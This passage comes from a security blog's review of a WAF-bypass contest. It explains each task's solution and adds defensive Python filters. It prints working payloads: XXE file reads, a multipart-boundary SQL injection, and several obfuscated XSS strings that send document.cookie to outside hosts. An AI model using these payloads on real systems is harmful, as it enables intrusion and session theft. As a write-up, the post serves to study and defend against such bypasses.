(XXE) injection. 
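<br /><br />Before the request forms themselves, an added example that is not the contest's or PT Application Firewall's code: a screening function for XML-RPC bodies that models the weak rule (a signature for the simple XXE form only) beside a policy that rejects any DOCTYPE, which covers every form this task lists. The three request bodies inside it are constructed copies of those forms, <span style="font-family: Courier New, Courier, monospace;">decode_xml_bytes</span> is a helper assumed here, and decoding UTF-16 bodies before the check goes slightly beyond what the task describes.<br /><br />
```python
import re
import xml.etree.ElementTree as ET

# Constructed request bodies: the three forms this task lists, plus a benign call.
SIMPLE_XXE = ('<!DOCTYPE input [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>'
              '<input>&xxe;</input>')
PARAM_ENTITY_XXE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE foo [\n'
    '<!ELEMENT foo ANY >\n'
    '<!ENTITY % xxe SYSTEM "flag" >\n'
    '%xxe;\n'
    ']>\n'
    "<body><method a='a'>test</method></body>")
DOCTYPE_XXE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE body SYSTEM "flag">\n'
    '<body><method>test</method></body>')
BENIGN = '<?xml version="1.0"?><body><method>test</method></body>'

# Weak rule, modelling a WAF that blocks only the simple form: a general
# entity declared with SYSTEM. "%" is not a word character, so the parameter
# entity "<!ENTITY % xxe SYSTEM" does not match, and the DOCTYPE-SYSTEM form
# declares no entity at all.
SIMPLE_XXE_RE = re.compile(r'<!ENTITY\s+\w+\s+SYSTEM\b')


def blocked_by_simple_signature(doc: str) -> bool:
    return SIMPLE_XXE_RE.search(doc) is not None


def decode_xml_bytes(raw: bytes) -> str:
    """Helper assumed for this example: inspect decoded text, not raw bytes,
    so a BOM-prefixed UTF-16 body cannot hide the markup from the check."""
    if raw.startswith((b'\xff\xfe', b'\xfe\xff')):
        return raw.decode('utf-16')
    return raw.decode('utf-8', errors='replace')


def blocked_by_doctype_policy(doc: str) -> bool:
    """Hardened rule: an XML-RPC endpoint never needs a DTD, so any DOCTYPE
    is rejected. That covers all three forms above, including the one that
    pulls in an external DTD without declaring any entity inline."""
    return '<!DOCTYPE' in doc


def screen_request(raw: bytes) -> bool:
    """True when the body may be passed on to the XML-RPC back end."""
    return not blocked_by_doctype_policy(decode_xml_bytes(raw))


def parse_method_call(raw: bytes) -> str:
    """Screen, then parse, and return the text of the <method> element."""
    if not screen_request(raw):
        raise ValueError('DOCTYPE is not allowed in an XML-RPC request')
    root = ET.fromstring(decode_xml_bytes(raw))
    node = root.find('method')
    if node is None or node.text is None:
        raise ValueError('no <method> element in request')
    return node.text


if __name__ == '__main__':
    samples = [('simple', SIMPLE_XXE), ('param-entity', PARAM_ENTITY_XXE),
               ('doctype', DOCTYPE_XXE), ('benign', BENIGN)]
    for label, doc in samples:
        print(f'{label:13} simple-signature={blocked_by_simple_signature(doc)!s:5} '
              f'doctype-policy={blocked_by_doctype_policy(doc)}')
    print('method:', parse_method_call(BENIGN.encode()))
```
<br /><br />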
Here is this vulnerability as detected by Application Inspector:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/7cc/ac0/ecf/7ccac0ecf342a2e93ab0c0d6986ddc9a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/7cc/ac0/ecf/7ccac0ecf342a2e93ab0c0d6986ddc9a.png" height="640" width="388" /></a></div><br />This task was a warm-up, and the Application Firewall was configured to block only the simple XXE form:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><!DOCTYPE input [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><input>&xxe;</input></span><br /><br />For example, a participant could obtain the flag using parameter entities:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><?xml version="1.0" encoding="UTF-8"?></span><br /><span style="font-family: Courier New, Courier, monospace;"><!DOCTYPE foo [</span><br /><span style="font-family: Courier New, Courier, monospace;"><!ELEMENT foo ANY ></span><br /><span style="font-family: Courier New, Courier, monospace;"><!ENTITY % xxe SYSTEM "flag" ></span><br /><span style="font-family: Courier New, Courier, monospace;">%xxe;</span><br /><span style="font-family: Courier New, Courier, monospace;">]></span><br /><span style="font-family: Courier New, Courier, monospace;"><body></span><br /><span style="font-family: Courier New, Courier, monospace;"><method a='a'>test</method></span><br /><span style="font-family: Courier New, Courier, monospace;"></body></span><br /><br />Another way was through the DOCTYPE declaration itself:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><?xml version="1.0" encoding="UTF-8"?></span><br /><span style="font-family: Courier New, Courier, monospace;"><!DOCTYPE body SYSTEM "flag"></span><br /><span style="font-family: Courier New, Courier, monospace;"><body><method>test</method></body></span><br /><br 
/><b><span style="font-size: large;">2. SQL Injection</span></b><br /><br />In this task, the goal was to obtain the flag from the database using SQL Injection. Most contestants tried to bypass the filter instead of paying attention to the hint: it was necessary to find a weakness in the WAF configuration, which was improper data normalization. In fact, data normalization is among the most serious problems of modern WAFs. Improper implementation gives attackers protocol-level ways to bypass the firewall. As Stefan Esser mentioned in his presentation <a href="http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf" target="_blank">Shocking News in PHP Exploitation</a> back in 2009, WAF developers try to create a general HTTP parser for all existing implementations, which is obviously impossible. The PT Application Firewall instead normalizes requests with the peculiarities of the specific back end in mind. In the task, normalization was disabled, which made the following bypass possible:<br /><br /><span style="font-family: Courier New, Courier, monospace;">POST /news.php HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: task2.waf-bypass.phdays.com</span><br /><span style="font-family: Courier New, Courier, monospace;">Accept: */*</span><br /><span style="font-family: Courier New, Courier, monospace;">Accept-Language: en</span><br /><span style="font-family: Courier New, Courier, monospace;">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br /><span style="font-family: Courier New, Courier, monospace;">Connection: close</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Type: multipart/form-data; boundary=------,xxxx</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Length: 191</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier 
New, Courier, monospace;">------,xxxx</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Disposition: form-data; name="img"; filename="img.gif"</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">GIF89a</span><br /><span style="font-family: Courier New, Courier, monospace;">------</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Disposition: form-data; name="id"</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">1' union select null,null,flag,null from flag limit 1 offset 1-- -</span><br /><span style="font-family: Courier New, Courier, monospace;">--------</span><br /><span style="font-family: Courier New, Courier, monospace;">------,xxxx--</span><br /><br />PHP has its own multipart parser, which takes the part of the boundary parameter before the comma as the boundary, while normal parsers take the entire string. Therefore, without proper normalization the WAF does not inspect the parameter, because it sees a file upload there, whereas PHP recognizes a regular parameter instead of file input, and the payload is delivered.<br /><br /><b><span style="font-size: large;">3. httpOnly</span></b><br /><br />This one and all subsequent tasks were about client-side vulnerabilities. We developed a Selenium bot that carried special cookies containing a flag. 
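<br /><br />The PHP boundary quirk from task 2 above, as an added example that is not the contest's or PT Application Firewall's code: a WAF-side check that parses a multipart body under both readings of the boundary parameter and flags any plain field PHP would receive that the generic reading hides inside a file part. The request is a constructed sample shaped like the one in task 2 (a four-dash boundary, so delimiter lines carry six dashes) with a placeholder instead of the SQL payload; <span style="font-family: Courier New, Courier, monospace;">parse_multipart</span> is a minimal parser written for this example, and the PHP behaviour it models is the strpbrk(",;") cut in php_rfc1867.c.<br /><br />
```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed request: the boundary parameter is "----,xxxx", so a generic
# parser looks for "------,xxxx" delimiter lines, while the PHP reading
# ("----") also matches the bare "------" lines.
CONTENT_TYPE = 'multipart/form-data; boundary=----,xxxx'
BODY = (
    b'------,xxxx\r\n'
    b'Content-Disposition: form-data; name="img"; filename="img.gif"\r\n'
    b'\r\n'
    b'GIF89a\r\n'
    b'------\r\n'                      # PHP: end of the file part
    b'Content-Disposition: form-data; name="id"\r\n'
    b'\r\n'
    b'PLACEHOLDER-VALUE\r\n'           # PHP: plain field "id"
    b'--------\r\n'                    # PHP: closing delimiter ("------" + "--")
    b'------,xxxx--\r\n'               # generic parser: closing delimiter
)

# A normal request for contrast: one plain field, unambiguous boundary.
CLEAN_CONTENT_TYPE = 'multipart/form-data; boundary=xxxx'
CLEAN_BODY = (
    b'--xxxx\r\n'
    b'Content-Disposition: form-data; name="id"\r\n'
    b'\r\n'
    b'1\r\n'
    b'--xxxx--\r\n'
)


@dataclass
class Part:
    name: str
    filename: Optional[str]   # None for a plain (non-file) field
    content: bytes


def generic_boundary(content_type: str) -> str:
    """Boundary as a typical parser reads it: the whole value up to ';'."""
    m = re.search(r'boundary=(?:"([^"]*)"|([^;\s]*))', content_type)
    if not m:
        raise ValueError('no boundary parameter in Content-Type')
    return m.group(1) if m.group(1) is not None else m.group(2)


def php_boundary(content_type: str) -> str:
    """Boundary as PHP reads it: an unquoted value is cut at the first ','
    or ';' (strpbrk(boundary, ",;") in php_rfc1867.c); a quoted value is kept."""
    m = re.search(r'boundary=(?:"([^"]*)"|([^,;\s]*))', content_type)
    if not m:
        raise ValueError('no boundary parameter in Content-Type')
    return m.group(1) if m.group(1) is not None else m.group(2)


def parse_multipart(body: bytes, boundary: str) -> List[Part]:
    """Minimal multipart/form-data parser. Like PHP, it tolerates trailing
    bytes on a delimiter line, which is what lets "------,xxxx" and
    "------" both count as delimiters under the PHP reading."""
    delimiter = b'--' + boundary.encode('ascii')
    parts: List[Part] = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b'--'):
            break                                   # closing delimiter
        _, _, rest = chunk.partition(b'\r\n')       # drop rest of delimiter line
        raw_headers, _, content = rest.partition(b'\r\n\r\n')
        headers = raw_headers.decode('latin-1')
        name = re.search(r'(?:^|;)\s*name="([^"]*)"', headers)
        filename = re.search(r'filename="([^"]*)"', headers)
        if content.endswith(b'\r\n'):
            content = content[:-2]                  # CRLF before next delimiter
        parts.append(Part(name.group(1) if name else '',
                          filename.group(1) if filename else None,
                          content))
    return parts


def plain_fields(parts: List[Part]) -> Dict[str, bytes]:
    return {p.name: p.content for p in parts if p.filename is None}


def hidden_fields(content_type: str, body: bytes) -> Set[str]:
    """Plain fields PHP would receive that the generic reading never exposes
    as fields: they sit inside a file part, so a WAF that normalizes only the
    generic way never inspects their values."""
    generic = plain_fields(parse_multipart(body, generic_boundary(content_type)))
    php = plain_fields(parse_multipart(body, php_boundary(content_type)))
    return set(php) - set(generic)


def should_block(content_type: str, body: bytes) -> bool:
    """Block when the two readings disagree. A stricter policy for PHP back
    ends is to reject any unquoted boundary containing ',' or ';' outright."""
    return bool(hidden_fields(content_type, body))


if __name__ == '__main__':
    print('hidden from generic parser:', hidden_fields(CONTENT_TYPE, BODY))
    print('block sample:', should_block(CONTENT_TYPE, BODY))
    print('block clean :', should_block(CLEAN_CONTENT_TYPE, CLEAN_BODY))
```
<br /><br />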
The goal was to steal these cookies.<br /><br />HttpOnly is a cookie flag restricting access via non-HTTP means such as JavaScript (hence the task name).<br /><br />Here is the vulnerable script code:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><h4>httpOnly bypass</h4></span><br /><span style="font-family: Courier New, Courier, monospace;"><p>In this task you need to bypass httpOnly and steal bot cookies using</span><br /><span style="font-family: Courier New, Courier, monospace;"><a href="http://waf-bypass.phdays.com/#bot">http://waf-bypass.phdays.com/#bot</a>.</span><br /><span style="font-family: Courier New, Courier, monospace;">All XSS checks are disabled, but there is an intentional bug, try to find it!</p></span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;"><?php</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">if(!isset($_GET['name'])) die("<p>Please provide name</p>");</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">if($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {</span><br /><span style="font-family: Courier New, Courier, monospace;"> setcookie('flag', $_GET['name'] . '-' . file_get_contents('./flag'));</span><br /><span style="font-family: Courier New, Courier, monospace;">} else {</span><br /><span style="font-family: Courier New, Courier, monospace;"> setcookie('flag', $_GET['name'] . '-' . md5(mt_rand()));</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">echo '<p>' . $_GET['name'] . 
'</p>';</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">?></span><br /><br />Note two things: the user-supplied value ends up in the cookie value, and the input is reflected into the response body as is. It is evident that if the bot follows a link with XSS, the injected script will not be able to send the bot's cookies anywhere, because the Application Firewall has set the httpOnly flag on them. To bypass this protection mechanism, it was necessary to put the string "httpOnly" into the cookie value, so that the WAF decided that the flag had already been set and there was no need to add another one.<br /><br /><span style="font-family: Courier New, Courier, monospace;">httponly.php?name=<script>document.location.href='http://sniffer.com?'%2bdocument.cookie</script>;HttpOnly</span><br /><br /><span style="font-size: large;"><b>4. Anomaly</b></span><br /><br />In this task, the contestants were invited to probe the anomaly detection mechanism, based on machine-learning algorithms, that underlies the PT Application Firewall. A statistical model was trained on a very loose subset of samples, and so it became overfit (i.e. it considered too wide a range of values legitimate). The bypass was to generate a string that fits the parameters of the trained statistical model. In this case, there was also a Cross-Site Scripting vulnerability, but the httpOnly property wasn't set. Even such a weakened statistical model was bypassed by only two contestants:<br /><br /><span style="font-family: Courier New, Courier, monospace;">aaaaaaaaaaaa ... [snip] ... 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaav%3Cvideo+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+src=//secsem.ru+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa+onerror=src%2b=document.cookie+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/%3E</span><br /><br />It should be mentioned that to "dilute" special characters detected by the WAF, the value of a tag attribute in another attribute was addressed. The latter attribute was located far enough for the string not to go beyond the threshold.<br /><br /><b><span style="font-size: large;">5. RegEx</span></b><br /><br />In this task, the goal was to bypass a filter that uses regular expressions and to steal the bot's cookie. The essential part of any traditional WAF are signatures based on regular expressions. Here, we saw once more that a good WAF shouldn't count on regexps only. 
Some bypass methods are given below:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><img src = http://dsec.ru/bitrix/templates/dsec/img/logo.png onload = \"\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.write('<im\\u0067 src = http://sergeybelove.ru?ccc='%2b\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.cooki\\u0065%2b'>')\"></span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">1%3Cvideo%20%20src%3dx%20onerror%3d%0Asrc='ht'%2b'tp:'%2b'//'+d\\u006fcument['\\x63ookie']%3E%3C/video%3E</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;"><svg onload=\"var xStuff=HTMLElement['con'%2b'structor'],yStuff=xStuff('var img=new'%2b' Ima'%2b'ge('%2b') ;im'%2b'g.sr'%2b'c=\\'http:/'%2b'/labs.tom.vg/cookie=\\'%2bdoc'%2b'ument.coo'%2b'kie;doc'%2b'ument.doc'%2b'umentEl'%2b'ement.appe'%2b'ndCh'%2b'ild'%2b'('%2b'img) ;'),zStuff=yStuff()\"></span><br /><br /><b><span style="font-size: large;">6. Sanitize</span></b><br /><br />In the last task, the contestants were invited to perform XSS after bypassing a protection mechanism that encoded input values reflected in responses into HTML entities.<br /><br /><span style="font-family: Courier New, Courier, monospace;">GET /sanitize.php?name=<script>alert(1)</script> HTTP/1.0</span><br /><br />-><br /><br /><span style="font-family: Courier New, Courier, monospace;">HTTP/1.0 200 OK</span><br /><span style="font-family: Courier New, Courier, monospace;">...</span><br /><span style="font-family: Courier New, Courier, monospace;">Hello, &lt;script&gt;alert(1)&lt;/script&gt;!</span><br /><br />Such protection seems perfect, but there was a way to bypass it. 
To find the value entered by a user, the WAF searches the entire HTTP response body, which can contain other HTML tags as well. The bypass idea was to trick the WAF into escaping tags already present in the response, so that the actual payload was not filtered.<br /><br /><b><span style="font-size: large;">Results</span></b><br /><br />The winner was a Moscow State University team consisting of Georgiy Noseevich, Andrey Petukhov, and Alexander Razdobarov. They managed to solve all the tasks! Ivan Novikov (d0znpp) took second place, and Tom Van Goethem, a speaker from Belgium, was third. All three medal winners received valuable prizes: an Apple iPad Air, a Sony Xperia Z2, and an annual license for Burp Suite Pro, respectively.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/d40/06b/72a/d4006b72a4a837a3ccf3c68b56a6aba2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/d40/06b/72a/d4006b72a4a837a3ccf3c68b56a6aba2.png" height="292" width="640" /></a></div><br />A bit of statistics: during the two contest days, <b>122 644 </b>requests were blocked, <b>101</b> contestants registered, and only <b>11</b> of them managed to obtain at least one flag.<br /><br />Day one dynamics<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/83f/a55/956/83fa559564dc65bb0ccdba93cbb2ab2d.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/83f/a55/956/83fa559564dc65bb0ccdba93cbb2ab2d.png" height="182" width="640" /></a></div><br />Day two dynamics<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/e98/a3d/734/e98a3d734227e8f0803c8bcba208e0eb.png" 
imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/e98/a3d/734/e98a3d734227e8f0803c8bcba208e0eb.png" height="180" width="640" /></a></div><br />Statistics by attacks<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/3cb/2ba/452/3cb2ba45266fe0793f02a3683af29652.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/3cb/2ba/452/3cb2ba45266fe0793f02a3683af29652.png" height="418" width="640" /></a></div><br />Statistics by tasks<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/37f/d84/7b8/37fd847b89c1919fe1fb7d7992c28be1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/37f/d84/7b8/37fd847b89c1919fe1fb7d7992c28be1.png" height="342" width="640" /></a></div><br />By the way, we implemented cool visualization with <a href="https://www.youtube.com/watch?v=HeWfkPeDQbY" target="_blank">logstalgia</a> for this contest.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/f6e/3c7/441/f6e3c744140a99c988cca83a51526ea0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/f6e/3c7/441/f6e3c744140a99c988cca83a51526ea0.jpg" height="480" width="640" /></a></div><br /><br />There we have it :)<br /><br /><i>Arseniy Reutov, Dmitriy Nagibin and PT Application Firewall Team</i></div>Unknownnoreply@blogger.com2698tag:blogger.com,1999:blog-5176771794789502609.post-25033304264480249862014-07-08T15:19:00.000+04:002014-07-08T15:20:14.917+04:00Review of Hash Runner Tasks<div dir="ltr" style="text-align: left;" trbidi="on"><div 
dir="ltr" style="text-align: left;" trbidi="on"><b><span style="font-size: large;">Intro</span></b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-oRlgE8VkMWk/U7vPLaKHDYI/AAAAAAAAEEY/reZGb4hlUd4/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-oRlgE8VkMWk/U7vPLaKHDYI/AAAAAAAAEEY/reZGb4hlUd4/s1600/1.png" /></a></div>This year, Hashrunner took place over the three days before Positive Hack Days, from May 16, 19:00 (UTC+4, Moscow) till May 19, 19:00 (UTC+4, Moscow). Among other things, we tried to respect the interests of geographically dispersed teams and cover 48 hours of the two weekend days in every time zone. We received very positive feedback about including the whole weekend, so we will try to keep it this way.<br /><br />Congratulations to the winners!<br /><br /><ol style="text-align: left;"><li>InsidePro with 22.81% (<a href="http://www.phdays.ru/download/Write-up.pdf" target="_blank">write-up</a>) won two R290x video cards plus souvenirs.</li><li>hashcat with 21.23% (<a href="http://hashcat.net/forum/thread-3397.html" target="_blank">write-up</a>) won an R290x video card plus souvenirs.</li><li>john-users with 12.78% (<a href="http://openwall.com/lists/john-users/2014/05/29/2" 